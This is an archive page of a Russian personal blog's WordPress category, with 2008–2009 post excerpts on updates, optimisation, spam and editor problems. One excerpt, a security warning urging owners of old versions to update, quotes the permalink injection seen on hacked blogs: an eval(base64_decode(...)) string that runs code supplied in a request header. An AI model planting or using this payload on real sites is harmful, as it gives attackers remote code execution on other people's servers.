Дом моих мыслей

Архив рубрики "Wordpress"

WordPress. Взлом старых версий

08.09.2009

WordpressОчередная маст рид заметка о безопасности WordPress. Среди читателей и просто блоггеров есть многие, кто еще пользуется старой версией движка. А я вам говорю всегда — обновляться нужно! Как просто обновить WordPress я уже рассказывал, проблем (практически) не бывает в 99% случаев.

Новая уязвимость в старых! версиях позволяет изувечить весь ваш блог. Методом MySQL-инъекции, можно поломать ЧПУ, сделав их совсем не рабочими, а еще злоумышленник получает доступ к администрированию блога!.

Атакованные блоги подвергаются хаку, который добавляет к пермалинку:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Продолжить чтение »

, , Wordpress

Оптимизация WordPress

06.08.2009

WordpressПоговорим об оптимизации WordPress. Писано про это уже столько, что можно начать оптимизацию с  базы, а закончить вебсервером. И поговорим потому, что несколько блогов, за последнее время, обратились за помощью. И не в том, что CMS последних версий стала плохо, а из-за того, что ряд есть сторонних причин, которые мешают системе или затормаживают ее.

Причина такой заторможенности как правило либо в плагинах, либо в теме, что встречается уже очень часто. Однажды была запись у меня о том, как можно оптимизировать тему WordPress, чтобы она заработала быстрее. Но это мелочи, которые лучше оставить на потом, на сладкое.

  • Оптимизация начинается с базы данных. Нужно оптимизировать таблицы. Заходим в phpMyAdmin, выбираем нашу БД и далее:

phpMyAdmin - оптимизация таблиц БД

Это поможет серверу БД более быстро работать с таблицами, что немного снизит нагрузку. В более ранних версиях phpMyAdmin может не быть пункта «Отметить требующие оптимизации». Тогда просто выбираете все таблицы и делаете с отмеченными «Оптимизировать».

  • Избавляемся от всех не нужных плагинов и особенно от тех, которые не совместимы с данной версией CMS. Очень часто такие плагины не совсем корректно работают.
  • Удаляем из темы 3 абсолютно не нужные вещи: версию движка и, если не планируете использовать Windows Live Writer, то и манифест. Добавляем 3 строчки кода в файл functions.php:

<?php remove_action(‘wp_head’, ‘wp_generator’); ?>
<?php remove_action(‘wp_head’, ‘wlwmanifest_link’); ?>
<?php remove_action(‘wp_head’, ‘rsd_link’); ?>

  • Отключаем ревизии записей без плагина. Добавляем в файл wp-config.php следующую строку:

define('WP_POST_REVISIONS', false);

Для удаления существующих ревизий (если не умеете — лучше не лазить):
DELETE a,b,c
FROM wp_posts a
LEFT JOIN wp_term_relationships b ON (a.ID = b.object_id)
LEFT JOIN wp_postmeta c ON (a.ID = c.post_id)
WHERE a.post_type = ‘revision’

Продолжить чтение »

, Wordpress

WordPress 2.8 и TinyMCE

01.07.2009

WordpressПосле совсем недавнего обновления блога на новый WordPress 2.8 и обновления плагина TinyMCE Advanced столкнулся с такой проблемой, что сам редактор взял и пропал.

Я без редактора как без рук — он мне строить и жить помогает, а потому его пропажа меня сильно расстроила.  Пропажа связана с работой плагина с компрессией. Вариантов лечения может быть 2: изменение конфига редактора или добавление одного файла.

Проблема с TinyMCE

Продолжить чтение »

, , Wordpress

WordPress 2.8

23.05.2009

WordpressСледующий шаг в версии нашего любимого движка для блогов, но версия пока beta1. В полной версии будет 788 различных фиксов. Я же, как обычно, поворчу, что «надобавляли всякой не совсем нужной начинки», но пользоваться буду как пользуюсь вовсю версией 2.7, правда иногда напрягающие  штуки хочется вырезать «на корню» :)

А теперь о том, что нас ждет внутри:

  • Добавлена функция загрузки тем с WordPress.org или вашего ПК. Я начал использовать функцию скачивания плагинов, это удобно, но вот менять темы как перчатки — думаю, не важное дополнение.
  • Обновили процедуру установки плагинов.
  • Контроль версий установленных тем — обновлять темы легко, а вот более старую версию нельзя установить не удалив новую.
  • Обновлена работа с виджетами как визуально, так и в коде.
  • Обновился визуальный редактор постов до версии 3.2.3. Я со стандартным редактором не работаю вообще, потому тут комментировать не могу, на сколько удобным он стал.
  • Добавлена подсветка кода в редакторе плагинов и тем.
  • Добавлено много новых функций(например, надпись о том, что у вас пароль случайный вам стоит его сменить или отказаться), исправлены старые.
  • и еще целый список…

Wordpress 2.8 внутри

+ небольшое видео о WordPress 2.8

, Wordpress

Пара штучек для WordPress

31.03.2009

Вступление.
WordpressИсключительно технический пост, т.к. в комментариях было, что начинал блог с WordPress, а сейчас все про картинки и т.д.
На самом деле я стал писать о WordPress меньше умышленно, стал переводить темы только на заказ, т.е. Вы попросили — я сделал или если мне самому очень нравится тема, плагины — тоже самое. Все это потому, что раньше был интерес, энтузязизм. Хотелось полезного людям дать. А сейчас? Сейчас столько всяких сайтов и блогов на эту тему, что только ленивый еще не завел у себя рубрику, блог и т.д. про это и не пытается заработать. Вот такие дела, скучно =)

Ну да теперь к паре штучек для вашего блога:

1. Убираем ненужное (как и можно много еще чего из вашей темы)

Если Вы откроете исходный код страницы вашего блога, то увидите вот такие строки:

Продолжить чтение »

, , Wordpress

WordPress 2.7. Красота.

12.11.2008

OMG! Чувак, ты в космосе!

WordpressОчередная красивая версия WordPress — 2.7 (не удержался и скачал). На этапе разработки меня пугали всякие, имхо, не нужные  штучки типа древовидного комментирования и т.п. — все это делается плагинами и лишний код не стоит добавлять. Хотя я так говорю всегда и потом привыкаю к эдаким штукам или просто их выключаю разными способами. Но то, что они сделали с админкой — шикарно =)

Если Вы ее еще не видели — скачайте посмотрите, это элегантно и приятно. Жаль, что они не додумались вставить ее в 2.6.х

Доска объявлений

Поражает новый дизайн, как я и говорил выше — симпатично, а местами практично. Очень чисто и приятно выглядит.

Wordpress 2.7: Доска объявлений

Продолжить чтение »

, , Wordpress

WordPress. О спаме и разделении

09.09.2008

Wordpress«С жульем Со спамом, допустим, надо бороться!» (классики).

Методы, которые предлагают производители плагинов, блоггеры я постоянно испытываю на своем блоге. Идет битва за “чистые” комментарии, а я выигрываю ибо сейчас аффторов и всякой муры в комментариях стало гораздо меньше, практически совсем пропали. У себя в комментариях Maul высказал идею: в админку добавить функционал, позволяющий оборачивать г..нокаммент в <noindex> => он перестает индексироваться Яндексом => флуд не поимел результата: не, это не выход, не метод уничтожения этой заразы. Нужно научить их тому, что от их настойчивости только им же хуже будет.

Однако есть один нюанс в методе, который использую я — у меня блокируются не только комментаторы, которые не прошли по конкурсу для отображения ссылки, но и все обратные ссылки тоже. Не порядок. Зачем же тем, кто честно ссылается подкладывать свинью? Пусть и им будет трафик: надо бы отделить коментарии от обратки. А с фэйковыми пингами, ссылками в тексте комментария отлично справляется Spam Karma.

Поехали?

, Wordpress

Битва за «чистые» комментарии

22.07.2008

Спаму - нетБитва со спамом продолжается. Очередные наплывы продавцов таблеток, качественных и недорогих дверей, замечательных услуг в области юриспруденции и недвижимости. Валятся в огромном количестве. Откуда сил у них столько?

Многие блоггеры сталкиваются с этой напастью (Любимый блог о кофе — За…надоели,  а в блоге у Дика периодически бывают суперобзоры любителей пописать эдак изысканно). А я, как и писал когда-то, что расскажу — рассказываю свой путь по борьбе с этими нечестивцами. О практически идеальном оружии.

Итак, вариантов борьбы может быть несколько: Продолжить чтение »

, , Wordpress

WordPress. Переход на 2.6

18.07.2008

WordpressКак вчера я и рассказывал, прочитал я тут новости, мнения и комментарии о новой версии WordPress и мне дюже захотелось ее поставить. Ранее на блоге стояла версия 2.2, которой мне хватало по самое нехочу. С версией 2.5.x я наигрался, поставив на 5 блогах. Не шибко она мне нравится, но делать нечего — раз производитель предлагает улучшенную версию продукта, то значит стоит идти с ним в ногу. Но к чему это в конце приведет? Пока не ясно…

Итак, что и как…

Продолжить чтение »

, , Wordpress

Я на ремонте

17.07.2008

WordpressСовсем на днях вышла новая версия прелестного движка WordPress 2.6 и меня посетила чудо мысль себе его поставить. Причем без пробы, без обкатки на локале.

Стояла у меня версия 2.2 и почитав способы я пошел самым простым путем — через плагин автоматического обновления. Он себя зарекомендовал на отлично на других моих блогах, где стояли версии с 2.3 начиная. Прошло все практически без потерь, правда с некоторыми нюансами. Сегодня обкатка проходит в «боевом» режиме, а завтра я расскажу о том, что пришлось решить, с чем пришлось столкнуться.

Продолжить чтение »

, Wordpress, Новости